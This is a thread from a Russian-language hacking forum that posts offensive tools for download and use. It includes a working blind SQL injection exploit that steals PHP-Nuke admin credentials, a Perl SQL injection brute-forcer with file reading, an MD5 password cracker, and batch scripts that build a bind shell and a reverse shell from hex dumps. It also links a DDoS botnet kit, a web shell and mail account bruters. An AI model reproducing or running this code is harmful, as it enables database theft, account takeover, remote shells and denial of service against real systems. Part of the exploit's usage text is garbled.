При выборе этого режима программа исчезнет с экрана и с панели задач.
Для возврата из скрытого режима нажмите эту же комбинацию клавиш.

Также в архиве с программой находятся следующие консольные утилиты для работы с файлами реестра SAM и SYSTEM:
GetSyskey - программа извлекает из файла реестра SYSTEM системный ключ SYSKEY и сохраняет его в отдельный 16-байтовый файл.

GetHashes - программа извлекает хэши пользователей из файла реестра SAM, используя файл с ключом SYSKEY

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: Creeping Death 20.01.2007, 13:04

RMOSChange

Программа изменяет HTTP заголовки Internet Explorer, Firefox, Mozilla,
так, что сервер(web-сайт), не сможет узнать какая у вас
установлена ОС, версия браузера и язык системы.

Избавляет от установки виртуальной машины.

конечно незабывем про proxy


Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 50 сообщений.

Автор: Creeping Death 18.02.2007, 11:24

sqlmap

sqlmap is an automatic blind SQL injection tool, developed in python, capable of enumerating an entire remote database, performing an active database fingerprint and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

Features

* Test of the remote url stability, based on page hash or string match;
* Identification of url dynamic parameters;
* Test numeric, string (single quote and double quotes) SQL injection on all url dynamic parameters and at first vulnerable it will be used to perform the future SQL injections;
* Possible selection of HTTP method for testing and exploiting dynamic parameters, GET or POST (default: GET);
* Fingerprint of web application database back-end based upon specific queries output which identify database characteristics and banner grabbing;
* Random HTTP User-Agent header selection;
* HTTP Cookie header provided, useful when web application requires authorization based on cookies and you an account;
* Provide an anonymous HTTP proxy address to pass by request to the target url;
* Other command line parameters to get database banner, enumerate databases, tables, columns, dump values, retrieve an arbitrary file content and provide own SQL expression to query remote database;
* Debug output messages in verbose mode execution;
* PHP setting magic_quotes_gpc evasion by encoding every query string, between single quotes, with CHAR (or similar) database function.


http://www.databasesecurity.com/dbsec/sqlmap-0.3.tar.gz

Автор: Creeping Death 18.02.2007, 11:38

SQL Injection Soft

SQLInjector
http://www.ngssoftware.com/


Bobcat
http://www.northern-monkee.co.uk/projects/bobcat/bin/BobCat_Alphav0.1.zip

Automagic
http://www.databasesecurity.com/dbsec/automagic.zip


HacmeBank
http://www.databasesecurity.com/dbsec/Hacme_Bank_Setupv2.15.zip

Absinthe
http://www.0x90.org/releases/absinthe/

Typhon III
http://www.ngssoftware.com/

Автор: ~NeoN~ 7.03.2007, 18:17

смотрим куки:
IECookiesView
Protected Storage PassView

Автор: Creeping Death 11.03.2007, 16:44

MD5CRACK


CODE
#!/usr/bin/perl
# use strict; Sorry next time i'll use it;)
# MD5 Hash Bruteforce Kit
# by Iman Karim (iman.karim@smail.inf.fh-bonn-rhein-sieg.de)
# URL : http://home.inf.fh-rhein-sieg.de/~ikarim2s/
# Date : 11.02.2007
# Info[0] : This Cracker is by far not the fastest! But it helped me alot to find "lost" passwords;)
# Info[1] : Written under Kubuntu Linux (Throw away Windows!)
# Info[2] : If you can code a bit perl, you can modify it to crack sha etc too...
# Greets to: Invisible!
$ver = "01";
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.

if ($dbgtmr<=0){ die "Set dbgtmr to a value >=1 !\n";};
use Digest::MD5 qw(md5_hex);
use Time::HiRes qw(gettimeofday);

if ($ARGV[0]=~"a") {
$alpha = "abcdefghijklmnopqrstuvwxyz";}
if ($ARGV[0]=~"A") {
$alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($ARGV[0]=~"d") {
$alpha = $alpha."1234567890";}
if ($ARGV[0]=~"x") {
$alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";}

if ($alpha eq "" or $ARGV[3] eq "") {usage();};
if (length($ARGV[3]) != 32) { die "Sorry but it seems that the MD5 is not valid!\n";};

print "Selected charset for attack: '$alpha\'\n";
print "Going to Crack '$ARGV[3]'...\n";

for (my $t=$ARGV[1];$t<=$ARGV[2];$t++){
crack ($t);
}

sub usage{
print "\n\nMD5 Hash Bruteforce Kit v_$ver\n";
print "by Iman Karim (iman.karim\@smail.inf.fh-bonn-rhein-sieg.de)\n";
print "http:\/\/home.inf.fh-rhein-sieg.de\/~ikarim2s\/\n\n";
print "USAGE\n";
print "./md5crack <charset> <mincount> <maxcount> <yourMD5>\n";
print " Charset can be: [aAdx]\n";
print " a = {'a','b','c',...}\n";
print " A = {'A','B','C',...}\n";
print " d = {'1','2','3',...}\n";
print " x = {'!','\"',' ',...}\n";
print "EXAMPLE FOR CRACKING A MD5 HASH\n";
print "./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all digits.\n";
print " MD5 Kit only tries combinations with a length from 1 and 3 characters.\n-------\n";
print "./md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all uppercase Alphas.\n";
print " MD5 Kit only tries passwords which length is exactly 3 characters.\n-------\n";
print "./md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with nearly every character.\n";
print " MD5 Kit only tries combinations with a length from 1 to 10 characters.\n";
die "Quitting...\n";
}

sub crack{
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++){ $RawString[i] = 0;}
$Start = gettimeofday();
do{
for (my $i =0;$i<$CharSet;$i++){
if ($RawString[$i] > length($alpha)-1){
if ($i==$CharSet-1){
print "Bruteforcing done with $CharSet Chars. No Results.\n";
$cnt=0;
return false;
}
$RawString[$i+1]++;
$RawString[$i]=0;
}
}
###################################################
$ret = "";
for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
$hash = md5_hex($ret);
$cnt++;
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr){
$cnt = int($cnt/$dbgtmr);
print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
$cnt=0;
$Start = gettimeofday();
}
print "$ARGV[3] != $hash ($ret)\n";
if ($ARGV[3] eq $hash){
die "\n**** Password Cracked! => $ret\n";
}
###################################################
#checkhash($CharSet)."\n";

$RawString[0]++;
}while($RawString[$CharSet-1]<length($alpha));
}

sub checkhash{
$CharSet = shift;
$ret = "";
for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
$hash = md5_hex($ret);
$cnt++;
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr){
$cnt = int($cnt/$dbgtmr);
print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
$cnt=0;
$Start = gettimeofday();
}

if ($ARGV[3] eq $hash){
die "\n**** Password Cracked! => $ret\n";
}

}

Автор: Creeping Death 25.03.2007, 15:12

PHP-nuke <=8.0 Final

CODE

#!/usr/bin/perl
#0day exploit for PHP-nuke <=8.0 Final
#Blind sql injection attack in INSERT syntax
#version for mysql >= 4.0.24, using 'brute force'
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#
#[+]Time normal query: 2 seconds
#[+]Length user's record: 5
#[+]Length password's record: 32
#[+]Login:
#admin
#[+]Password:
#b481ab90de84a345c665f1e4ef3c2
#[+]Super admin:
#admin:b481ab90de84a345c66585e1f4cf16e4
use strict;
use warnings;
use LWP;
my $offset=4;#It is the most important variable!!
my $adres=shift or help();
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres);
my
($respone,$komenda,$poczatek,$koniec,$czas_nor,$i,$j,$dlugosc_user,$user,
$hash,$referer,$czy_dziala,$znak);
banner();
$czas_nor=polacz("http://www.krasza.int.pl");
print "[+]Time normal query: $czas_nor seconds\n";
$dlugosc_user=ustal_dlugosc("aid",8);
print "[+]Length user's record: $dlugosc_user\n";
print "[+]Length password's record: 32\n";
print "[+]Login:\n";
$user=brute_force_aid($dlugosc_user);
print "[+]Password:\n";
$hash=brute_force_pass(32);
print "[+]Super admin:\n";
print "$user:$hash\n";
##
sub brute_force_pass{
my ($dlugosc)=@_;
my ($i,$j,$referer,$wynik,$dolny_zakres);
for($i=1;$i<=$dlugosc;$i++){
for($j=48;$j<=122;$j++){

$referer="http://www.krasza.int.pl'),(-1,
(SELECTIF((ASCII(SUBSTRING(`pwd`,".$i.",
1))=".$j.")
& 1,
benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE
`radminsuper`=1))/*";
$czy_dziala=czy_dziala($referer);
if($czy_dziala==1){
$znak=chr($j);
print "$znak";
$wynik.=$znak;
if($i<$dlugosc){
$i+=1;
$j=47;
}else{
last;
}
}
#przeskok-optymalizacja;]
if($j==57){
$j=96;
}
}
}
print "\n";
return $wynik;
}
sub brute_force_aid{
my ($dlugosc)=@_;
my ($i,$j,$referer,$wynik,$dolny_zakres);
for($i=1;$i<=$dlugosc;$i++){
for($j=48;$j<=122;$j++){

$referer="http://www.krasza.int.pl'),(-1,
(SELECTIF((ASCII(SUBSTRING(`aid`,".$i.",
1))=".$j.")
& 1,
benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE
`radminsuper`=1))/*";
$czy_dziala=czy_dziala($referer);
if($czy_dziala==1){
$znak=chr($j);
print "$znak";
$wynik.=$znak;
if($i<$dlugosc){
$i+=1;
$j=47;
}else{
last;
}
}
if($j==57){
$j=64;
}
if($j==90){
$j=96;
}
}
}
print "\n";
return $wynik;
}
sub ustal_dlugosc{
my ($pole,$len)=@_;
my ($referer,$narazie_dziala_liczba,$nie_dziala_liczba);
$narazie_dziala_liczba=0;
$nie_dziala_liczba=65;
#for($len=1;$len<64;$len++){
while($len<=64){
if($narazie_dziala_liczba==$len ||
$nie_dziala_liczba<=$len){
return $narazie_dziala_liczba;
}

$referer="http://www.krasza.int.pl'),(-1,
(SELECTIF((LENGTH(`".$pole."`)>".
$len.")
& 1, benchmark(50000000,CHAR(0)),0) FROM
`nuke_authors` WHERE `radminsuper`=1))/*";
$czy_dziala=czy_dziala($referer);
if($czy_dziala==1){
$narazie_dziala_liczba=$len+1;
$len+=2;
}else{
$nie_dziala_liczba=$len+1;
$len-=1;
}
}
print "[-]Exploit Failed\n";
exit;
}
sub czy_dziala{
my ($refik)=@_;
my $czas_zapytania;
$czas_zapytania=polacz($refik);
if($czas_zapytania>$czas_nor+$offset){
return 1;
}else{
return 0;
}
}
sub polacz{
my ($referrer)=@_;
my ($czas,$czas_poczatek,$czas_koniec);
$zadanie->referer($referrer);
$czas_poczatek=time();
$respone=$ua->request($zadanie);
$respone->is_success or die "$adres : ",$respone->message,"\n";
$czas_koniec=time();
$czas=$czas_koniec-$czas_poczatek;
return $czas;
}
sub banner{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Blind sql injection attack in INSERT syntax\n";
print "version mysql >= 4.0.24, using 'brute force'\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
}
sub help{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Blind sql injection attack in INSERT syntax\n";
print "version mysql >= 4.0.24, using 'brute force'\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
print "Use:\n";
print "\tperl exploit.pl http://\n";%20%20%20%20%20%20%20%20print%20"\t%5burl%5d-vicitim%20webpage%20with%20index.php\n";%20%20%20%20%20%20%20%20print%20"Example:\n";%20%20%20%20%20%20%20%20print%20"\tperl%20bruteforce.pl%20%5burl=
exit(0);
}


Автор: Creeping Death 25.03.2007, 21:29

ВНИМАНИЕ!


в данной разрешены посты, с просьбой о нахождении той или иной программы, НО:
1)должно быть четко и "по-русски" описано, что конкретно надо
2)под какую платформу программа нужна.

после выполнения заявки, одним из форумчан, посты с просьбами будут удаляться.

заявки по развитию, улучшению данной темы, пожалуйста, в ПМ


Код
Арсенал хакера.
Так и представляются стойки с копьями мечами,манекены с надетыми доспехами.. А в уголках пылятся метательные кинжалы и колчаны.Ведь есть копьё и тыкай ним пока не найдёшь щель в доспехах..Но пока не умер хранитель арсенал никогда не будет пустовать.И все новые и новые последователи хранителя приносят снаряжение и бережно раскладывают его по полкам уходящим в непроглядный мрак Сети. (c)bdrFsg

Автор: Creeping Death 26.03.2007, 16:08

Blueprint (V. 0.1-3) - a perl tool to identify Bluetooth devices

This version recognizes about 53 different devices.


http://trifinite.org/Downloads/bp_v01-3.zip

Автор: is) 27.03.2007, 21:52

UDC
программа, созданная для быстрого восстановления пароля по хэш-значению для различных алгоритмов хэширования (более 40: MD5, NTLM, DES, MD4, SHA...).

* Обычному пользователю она поможет при восстановлении забытых паролей (например, подбор пароля в Windows), благодаря поддержке уникального мгновенного режима восстановления пароля, по похожей на него строке.

* Организации могут восстанавливать пароли к неограниченному числу пользователей одновременно, практически без потери скорости; при помощи UDC, администрация форума может за пару секунд выявить все "слабые" пароли в системе.

* Для решения более серьезных переборных задач поможет поддержка многопроцессорных систем и автоматического распределения атаки в реальном времени.

Текущая версия ядра - 2.0.9.2, обновление от 23 марта 2007 (http://the-udc.com/rus/download.html)

Новости, комментарии, помощь и словари вы найдете на нашем форуме (http://the-udc.com/forum/)

Получить полную версию UDC бесплатно! (http://the-udc.com/forum/index.php?topic=33.0)

Автор: Creeping Death 28.03.2007, 20:49

NetBot_Attacker 1.4 English version

By:Security warning team(www.hackeroo.com)Development

Function on :

NetBot_Attacker Is a comprehensive pressure as well as the DDOS test attack

He may control the most PC computer to start DDOS to attack!

The main attack type has:

Ordinary attack: SYN Flood,ICMP Flood,UDP Flood,UDP small,TCP Flood,TCP multi-link

WEB Attack:HTTP No-Cache Get Flood,CC Variety attack,HTTPGET

Special attack: GAME attack,CIDR attack,Hybrid attack

Auxiliary function::

Download operation,Shutdown unloading,Open URL,All shutdown

Help:You only need to have the FTP space and may use it,

Or you are fixed IP,Or your free application dynamic domain name.


The thanks supports NetBot_Attacker,We also opened the VIP edition.

VIP service of edition end little, EXE WROM, U records of spread, Intranet travel, attack might to be further loud .


安全警戒线(Security warning team) www.hackeroo.com

Buy VIP edition connection MSN:hackeroo#hotmail.com



http://rapidshare.com/files/22099705/NetBot_Attacker_1.4_English.rar.html

Автор: @llexxxei 11.04.2007, 13:58

Вскрываем *.rar

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: Gener 22.04.2007, 18:33

Metasploit Framework (согласно описанию) это законченная среда для написания, тестирования и использования кода эксплойтов. Эта среда обеспечивает надежную платформу для испытаний на проникновение, разработки шелкодов и исследования уязвимостей". Написан на Perl (с некоторыми частями на ассемблере, Python и C) – отсюда нет привязки к какой либо платформе – будет работать в любой системе, где есть интерпретатор Perl`a (с оговоркой, см. дальше). На данный момент, пакет Metasploit Framework функционирует как на Linux так и на Windows, а так же на Мас. Скачать последнюю версию пакета для соответствующей ОС можно здесь: http://www.metasploit.com/
(Среда под Windows базируется на доработанном Cygwin, что удобно, т.к. это дает пользователю извесную консоль. Однако, были некоторые проблемы с поддержкой Active Perl, поэтому поддерживается только Cygwin Perl.

Вот прямые линки для скачивания последней версии:

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: Gener 25.04.2007, 20:17

Mail.ru Loginer Free

Чекер мыл на сервера mail.ru (и всех поддоменах)
+малый траф (13 мыл примерно 24 кб)
+высокая скорость работы
+работает с парсеными логами
+drag&drop файла в окно программы с распознованием его типа

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.

пароль: mcbobo

Автор: Creeping Death 6.05.2007, 18:32

Cнимаем пароли. небольшой список программ.

Windows Password Recovery Bootdisk 1.0.0.1
http://www.rixler.com/eng/download/bootdisk.zip

Internet Password Recovery Toolbox 1.3.0.2
http://www.rixler.com/eng/download/iprtbox.zip

Internet Explorer Password Recovery Master 1.4.0.4
http://www.rixler.com/eng/download/iepasrec.zip

Outlook Express Password Recovery Master 1.2.0.4
http://www.rixler.com/eng/download/oepasrec.zip

Dial-up Password Recovery Master 1.3.0.6
http://www.rixler.com/eng/download/dpasrec.zip

FTP Password Recovery Master 1.1.0.1
http://www.rixler.com/download/ftpasrec.zip

Instant Messengers Password Recovery Master 1.0.0.4
http://www.rixler.com/download/impasrec.zip

Email Password Recovery Master 1.1.0.1
http://www.rixler.com/download/empasrec.zip

Opera Password Recovery Master 1.0.0.4
http://www.rixler.com/download/oppasrec.zip

Firefox Password Recovery Master 1.0.0.4
http://www.rixler.com/download/ffpasrec.zip

Office Password Recovery Toolbox 1.0.0.4
http://www.rixler.com/download/oprtbox.zip

Office Multi-document Password Cracker 1.0.0.1
http://www.rixler.com/eng/download/mdpascrk.zip

Word Password Recovery Master 1.0.1.1
http://www.rixler.com/eng/download/wpasrec.zip

Excel Password Recovery Master 1.0.0.8
http://www.rixler.com/eng/download/epasrec.zip

Outlook Password Recovery Master 1.0.0.7
http://www.rixler.com/eng/download/opasrec.zip

Access Password Recovery Master 1.0.0.5
http://www.rixler.com/eng/download/apasrec.zip

VBA Password Recovery Master 1.0.0.3
http://www.rixler.com/eng/download/vbpasrec.zip

Zip Password Recovery Master 6.2.0.0
http://www.rixler.com/download/zipprm.exe

Computer Lock Up 1.0.0.4
http://www.rixler.com/eng/download/complock.zip

Автор: Creeping Death 6.05.2007, 18:45

Genom-mail.ru bruter
http://genom.h10.ru/1111.rar

Автор: Creeping Death 8.05.2007, 23:01

Скрипт для проверки на sql-инъекцию, переборо количества столбцов и имен таблиц по словарю.

CODE

#!/usr/bin/perl
#=========================================================================#
use LWP::UserAgent;
use Getopt::Std;
#=========================================================================#

#=========================================================================#
#=MAIN===================================================================#
print "\n AAAAAA OOOOOO H H\n";
print " A A O O H H\n";
print " AAAAAA O O HHHHH\n";
print " A A O O H H\n";
print " A A OOOOOO H H\n\n";
$filt=1; #only chars in resolt
my $www = LWP::UserAgent->new;
uss();
if(!$ARGV[0])
{
ans();
while (true)
{
print "\nNew file (^c for quit) ->";
$f=<STDIN>;
$f =~ s/\n//;
enc(); #encode file
burl();
conn();
getres();
}
}
if ($ARGV[0] eq '-b')
{
print "Url for brute-> "; $u=<STDIN>;
$u =~ s/\n//;
brute();
}
if ($ARGV[0] eq '-t')
{
print "Url for brute-> "; $u=<STDIN>;
$u =~ s/\n//;
brute_table()
}
#=END=MAIN============================================================#
#=======================================================================#

sub brute()
{
$max=40;
$res='';
for ($j=1;$j<$max;$j++)
{
for ($i=1;$i<$j+1;$i++)
{
$utmp.=$i."26639-1,";
}
$utmp = substr($utmp, 0, length ($utmp) - 1 );
$utmp = $u."+UNION+SELECT+".$utmp."/*";
if($coll=chk($utmp))
{
$utmp =~ s\26639-1\\g;
print("[+$j] OK! Coloun number $coll is visible\r\n$utmp");
exit(0);
}
else
{
print("[-$j] falure... ($szz Bytes)\r\n");
}
#print $utmp."\r\n";
$utmp="";
}
}
########################################
sub brute_table()
{
print("--- bruting Colouns ---\r\n");
$max=40;
$res='';
for ($j=1;$j<$max;$j++)
{
for ($i=1;$i<$j+1;$i++)
{
$utmp.=$i."26639-1,";
}
$utmp = substr($utmp, 0, length ($utmp) - 1 );
$utmp = $u."+UNION+SELECT+".$utmp."/*";
if($coll=chk($utmp))
{

print("[+$j] OK! Coloun number $coll is visible\r\n$utmp");
print("\r\n--- bruting Tables ---\r\n");
open(CATFILE, $ARGV[1]);
while($line=readline(CATFILE))
{
chomp($line);
$sql=substr($utmp,0,length($utmp)-2);
$sql.="+FROM+".$line."/*";
if (chk($sql))
{
$sql =~ s\26639-1\\g;
print "[OK] ".$sql."\r\n";
$all_sql.="[OK] ".$sql."\r\n";
}
else
{
print "[-] No table $line\r\n";
}
$sql="";
}
print("\r\n--- Results ---\r\n");
print $all_sql;
exit;
}
else
{
print("[-$j] falure... ($szz Bytes)\r\n");
}
#print $utmp."\r\n";
$utmp="";
}
}
########################################


sub chk()
{
$resp = $www -> get( $_[0] ) or die();
$szz=length($resp->content());
if ($resp->content() =~ /(\d+)26638/) {return($1);}
}

sub ans()

{
exit("bete verion, load_file not correctly working. use -b or -t ");
print "\nAnsver some questions wink.gif\r\n";
print "Url for union-> "; $u=<STDIN>;
print "Number of coloums -> "; $n=<STDIN>;
print "Coloum with union -> "; $c=<STDIN>;
$u =~ s/\n//;
$f =~ s/\n//;
}

sub enc()
{
for ($i=0;$i<length($f);$i++) {$enc .= ord(substr($f, $i,1 )).',';}
$enc = substr($enc, 0, length ($enc) - 1 );
$f=$enc;
$enc='';
}

sub burl()
{
print "[~] File: $f\n";
$ur = $u; $tmp='';
for ($i=0;$i<$n;$i++)
{
if($i==$c-1)
{
$tmp.="load_file(char($f)),";
}
else
{
$tmp.="0,";
}
}
$tmp = substr($tmp, 0, length ($tmp) - 1 );
$ur.= "+union+select+$tmp/*";
print "[~] url: $ur\n";
}

sub conn ()
{
print "[~] Sending ...\n";
my $resp = $www -> get( $ur );
$cont = $resp -> content();
}

sub getres()
{
$s="_page\">";
$e="</";
$result;
#print $cont;
print "[~] Start: $s \n";
print "[~] End: $e \n";
print "[~] Searching...\n ";
@stringz=split("\n",$cont);
for(@stringz)
{
if(/$e/) { $p = 0; }
$result .= $_."\r\n" if $p;
if(/$s/){ $p = 1; }
}
$result =~ tr/a-zA-Z /a-zA-Z/d;
if($result)
{
print "[+] I found something! \n\n $result";
}
else
{
print "[-] Not found...\n ";
}
$result='';
}



sub uss()
{
print 'AOH SQL INJECTION TOOL By AoH]Slon and AoH]GvOzDiK'."\n";
print '-b for brute colouns'."\n";
print '-t [dictionary_table] for brute tables and colouns'."\n\n";
}

Автор: Creeping Death 9.05.2007, 12:43

GFS-webshell ver 4.0.0.0
Возможности:
1. Удобная навигация по файловой системе жертвы
2. Закачка файлов на сервер жертвы
3. Работа с MySQL
4. Бинд портов и бэкконект
5. Скан портов
6. Брут фтп и MySQL различными способами


http://www.gfs-team.ru/?act=downloads&id=99

FTP-BruteForce ver 1.0

http://www.gfs-team.ru/?act=downloads&id=101

Автор: Creeping Death 9.05.2007, 12:59

Bind.bat , creates a bind shell on port specified

CODE

echo off && echo n 1.dll >123.hex && echo e 0100 >>123.hex
echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 67 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 >>123.hex
echo e 0180 >>123.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 63 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex
echo e 0200 >>123.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 77 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13 >>123.hex
echo e 0280 >>123.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00 >>123.hex
echo e 0300 >>123.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 38 42 00 00 45 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c fa 31 40 03 6a 01 e8 fc 86 02 f9 f5 30 ba 18 fc fb bf 14 b2 c7 1f 6a 91 02 06 bd 3c 0c 02 e8 b0 23 a3 60 f6 59 66 c7 05 58 ce 4f 02 15 3a 19 e8 d8 5d 50 d9 aa 86 3d 66 a3 5a 31 c8 3c 5c a0 01 14 6a 10 68 29 14 ff 35 36 14 e8 82 12 29 05 0d 94 81 5e d0 0f ca >>123.hex
echo e 0380 >>123.hex && echo 60 5c c5 a1 1e 05 88 3c 30 be c2 2a 44 51 45 04 ea 2d 14 fe 28 9f 42 68 48 93 a9 45 31 46 fb 28 e1 08 a5 8b 0b 85 46 14 e8 26 5f 07 c3 cc ff 25 20 1a 81 bb 2a 14 06 43 0c 21 1c 90 18 c8 10 64 04 4e cc 20 55 8b ec 81 c4 3f 7c fe f1 0c 56 57 e8 3a c7 89 03 45 fc 33 c9 8b 75 a9 ac 3c c0 74 07 e8 22 f2 f7 03 41 eb f4 51 d1 e9 90 e1 58 3b 01 c1 74 0b 5f 5e b8 03 10 c9 c2 08 e1 86 49 8d >>123.hex
echo e 0400 >>123.hex && echo bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 48 f4 9d 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee e7 44 bb 1f 16 a9 ce 11 >>123.hex
echo e 0480 >>123.hex && echo 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 a8 92 52 e1 06 00 00 30 40 00 63 30 6d 64 00 81 3f 40 00 0c 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 61 71 63 1b 65 70 74 10 e1 69 73 db ca 6e 01 57 53 41 cb f9 61 72 f0 75 70 cf 18 68 23 6f 6e 73 1d 0e 62 69 94 64 19 >>123.hex
echo e 0500 >>123.hex && echo 9f c3 63 6b 65 74 bf 06 ff 03 e1 b1 91 1a 72 6e cd 6c 58 4a 47 c3 36 43 6f 6d 8b 61 37 5a 4c 62 cc 4c 80 fc 72 ed f7 3b a8 50 6f 6c ce 73 3b 21 00 00 00 00 00 00 81 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 ec be ff ff 00 00 00 02 00 00 00 0c 40 00 00 >>123.hex
echo r cx >>123.hex && echo 0477 >>123.hex && echo w >>123.hex && echo q >>123.hex && debug<123.hex && copy 1.dll bind.exe
rem *********CHANGE PORT NUMBER HERE******
bind.exe 8080
deleteit:
del bind.exe
IF EXIST bind.exe GOTO kill
del %0




Reverse.bat , Creates an exe and connects back to specified IP/HOST and Port

CODE

echo off && echo n 1.dll >123.hex
echo e 0100 >>123.hex && echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 df 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 >>123.hex
echo e 0180 >>123.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 db 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex
